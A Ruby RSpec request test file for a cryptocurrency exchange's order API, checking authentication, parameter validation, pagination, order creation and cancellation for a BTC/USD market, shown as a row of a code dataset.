7acd4e1c8b1c8d07cf345fcabaf3cc04b7743e8f | 10,334 | # encoding: UTF-8
# frozen_string_literal: true
describe APIv2::Orders, type: :request do
let(:member) { create(:member, :level_3) }
let(:level_0_member) { create(:member, :level_0) }
let(:token) { jwt_for(member) }
let(:level_0_member_token) { jwt_for(level_0_member) }
describe 'GET /api/v2/orders' do
before do
create(:order_bid, market_id: 'btcusd', price: '11'.to_d, volume: '123.123456789', member: member)
create(:order_bid, market_id: 'btcusd', price: '12'.to_d, volume: '123.123456789', member: member, state: Order::CANCEL)
create(:order_ask, market_id: 'btcusd', price: '13'.to_d, volume: '123.123456789', member: member)
create(:order_ask, market_id: 'btcusd', price: '14'.to_d, volume: '123.123456789', member: member, state: Order::DONE)
end
it 'should require authentication' do
get '/api/v2/orders', market: 'btcusd'
expect(response.code).to eq '401'
end
it 'should validate market param' do
api_get '/api/v2/orders', params: { market: 'usdusd' }, token: token
expect(response).to have_http_status 422
expect(JSON.parse(response.body)).to eq ({ 'error' => { 'code' => 1001, 'message' => 'market does not have a valid value' } })
end
it 'should validate state param' do
api_get '/api/v2/orders', params: { market: 'btcusd', state: 'test' }, token: token
expect(response.code).to eq '422'
expect(JSON.parse(response.body)).to eq ({ 'error' => { 'code' => 1001, 'message' => 'state does not have a valid value' } })
end
it 'should return active orders by default' do
api_get '/api/v2/orders', params: { market: 'btcusd' }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).size).to eq 2
end
it 'should return complete orders' do
api_get '/api/v2/orders', params: { market: 'btcusd', state: Order::DONE }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).first['state']).to eq Order::DONE
end
it 'should return paginated orders' do
api_get '/api/v2/orders', params: { market: 'btcusd', limit: 1, page: 1 }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).first['price']).to eq '11.0'
api_get '/api/v2/orders', params: { market: 'btcusd', limit: 1, page: 2 }, token: token
expect(response).to be_success
expect(JSON.parse(response.body).first['price']).to eq '13.0'
end
it 'should sort orders' do
api_get '/api/v2/orders', params: { market: 'btcusd', order_by: 'asc' }, token: token
expect(response).to be_success
orders = JSON.parse(response.body)
expect(orders[0]['id']).to be < orders[1]['id']
api_get '/api/v2/orders', params: { market: 'btcusd', order_by: 'desc' }, token: token
expect(response).to be_success
orders = JSON.parse(response.body)
expect(orders[0]['id']).to be > orders[1]['id']
end
it 'denies access to unverified member' do
api_get '/api/v2/orders', token: level_0_member_token
expect(response.code).to eq '401'
expect(JSON.parse(response.body)['error']).to eq( {'code' => 2000, 'message' => 'Please, pass the corresponding verification steps to enable trading.'} )
end
end
describe 'GET /api/v2/order' do
let(:order) { create(:order_bid, market_id: 'btcusd', price: '12.326'.to_d, volume: '3.14', origin_volume: '12.13', member: member, trades_count: 1) }
let!(:trade) { create(:trade, bid: order) }
it 'should get specified order' do
api_get '/api/v2/order', params: { id: order.id }, token: token
expect(response).to be_success
result = JSON.parse(response.body)
expect(result['id']).to eq order.id
expect(result['executed_volume']).to eq '8.99'
end
it 'should include related trades' do
api_get '/api/v2/order', params: { id: order.id }, token: token
result = JSON.parse(response.body)
expect(result['trades_count']).to eq 1
expect(result['trades'].size).to eq 1
expect(result['trades'].first['id']).to eq trade.id
expect(result['trades'].first['side']).to eq 'buy'
end
it 'should get 404 error when order doesn\'t exist' do
api_get '/api/v2/order', params: { id: 99_999 }, token: token
expect(response.code).to eq '404'
end
end
describe 'POST /api/v2/orders/multi' do
before do
member.get_account(:btc).update_attributes(balance: 100)
member.get_account(:usd).update_attributes(balance: 100_000)
end
it 'should create a sell order and a buy order' do
params = {
market: 'btcusd',
orders: [
{ side: 'sell', volume: '12.13', price: '2014' },
{ side: 'buy', volume: '17.31', price: '2005' }
]
}
expect do
api_post '/api/v2/orders/multi', token: token, params: params
expect(response).to be_success
result = JSON.parse(response.body)
expect(result.size).to eq 2
expect(result.first['side']).to eq 'sell'
expect(result.first['volume']).to eq '12.13'
expect(result.last['side']).to eq 'buy'
expect(result.last['volume']).to eq '17.31'
end.to change(Order, :count).by(2)
end
it 'should create nothing on error' do
params = {
market: 'btcusd',
orders: [
{ side: 'sell', volume: '12.13', price: '2014' },
{ side: 'buy', volume: '17.31', price: 'test' } # <- invalid price
]
}
# expect {
# AMQPQueue.expects(:enqueue).times(0)
# signed_post '/api/v2/orders/multi', token: token, params: params
# expect(response.code).to eq '422'
# expect(response.body).to eq ({'error':{'code':2002,'message':'Failed to create order. Reason\: Validation failed\: Price must be greater than 0'}})
# }.not_to change(Order, :count)
end
end
describe 'POST /api/v2/orders' do
it 'should create a sell order' do
member.get_account(:btc).update_attributes(balance: 100)
expect do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: '12.13', price: '2014' }
expect(response).to be_success
expect(JSON.parse(response.body)['id']).to eq OrderAsk.last.id
end.to change(OrderAsk, :count).by(1)
end
it 'should create a buy order' do
member.get_account(:usd).update_attributes(balance: 100_000)
expect do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'buy', volume: '12.13', price: '2014' }
expect(response).to be_success
expect(JSON.parse(response.body)['id']).to eq OrderBid.last.id
end.to change(OrderBid, :count).by(1)
end
it 'should return cannot lock funds error' do
old_count = OrderAsk.count
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: '12.13', price: '2014' }
expect(response.code).to eq '422'
expect(response.body).to eq '{"error":{"code":2005,"message":"Not enough funds to create order."}}'
expect(OrderAsk.count).to eq old_count
end
it 'should give a number as volume parameter' do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: 'test', price: '2014' }
expect(response.code).to eq '422'
expect(response.body).to eq '{"error":{"code":1001,"message":"volume is invalid"}}'
end
it 'should give a number as price parameter' do
api_post '/api/v2/orders', token: token, params: { market: 'btcusd', side: 'sell', volume: '12.13', price: 'test' }
expect(response.code).to eq '422'
expect(response.body).to eq '{"error":{"code":1001,"message":"price is invalid"}}'
end
end
describe 'POST /api/v2/order/delete' do
let!(:order) { create(:order_bid, market_id: 'btcusd', price: '12.326'.to_d, volume: '3.14', origin_volume: '12.13', locked: '20.1082', origin_locked: '38.0882', member: member) }
context 'succesful' do
before do
member.get_account(:usd).update_attributes(locked: order.price * order.volume)
end
it 'should cancel specified order' do
AMQPQueue.expects(:enqueue).with(:matching, action: 'cancel', order: order.to_matching_attributes)
expect do
api_post '/api/v2/order/delete', params: { id: order.id }, token: token
expect(response).to be_success
expect(JSON.parse(response.body)['id']).to eq order.id
end.not_to change(Order, :count)
end
end
context 'failed' do
it 'should return order not found error' do
api_post '/api/v2/order/delete', params: { id: '0' }, token: token
expect(response.code).to eq '422'
expect(JSON.parse(response.body)['error']['code']).to eq 2003
end
end
end
describe 'POST /api/v2/orders/clear' do
before do
create(:order_ask, market_id: 'btcusd', price: '12.326', volume: '3.14', origin_volume: '12.13', member: member)
create(:order_bid, market_id: 'btcusd', price: '12.326', volume: '3.14', origin_volume: '12.13', member: member)
member.get_account(:btc).update_attributes(locked: '5')
member.get_account(:usd).update_attributes(locked: '50')
end
it 'should cancel all my orders' do
member.orders.each do |o|
AMQPQueue.expects(:enqueue).with(:matching, action: 'cancel', order: o.to_matching_attributes)
end
expect do
api_post '/api/v2/orders/clear', token: token
expect(response).to be_success
result = JSON.parse(response.body)
expect(result.size).to eq 2
end.not_to change(Order, :count)
end
it 'should cancel all my asks' do
member.orders.where(type: 'OrderAsk').each do |o|
AMQPQueue.expects(:enqueue).with(:matching, action: 'cancel', order: o.to_matching_attributes)
end
expect do
api_post '/api/v2/orders/clear', token: token, params: { side: 'sell' }
expect(response).to be_success
result = JSON.parse(response.body)
expect(result.size).to eq 1
expect(result.first['id']).to eq member.orders.where(type: 'OrderAsk').first.id
end.not_to change(Order, :count)
end
end
end
| 39.143939 | 183 | 0.628314 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.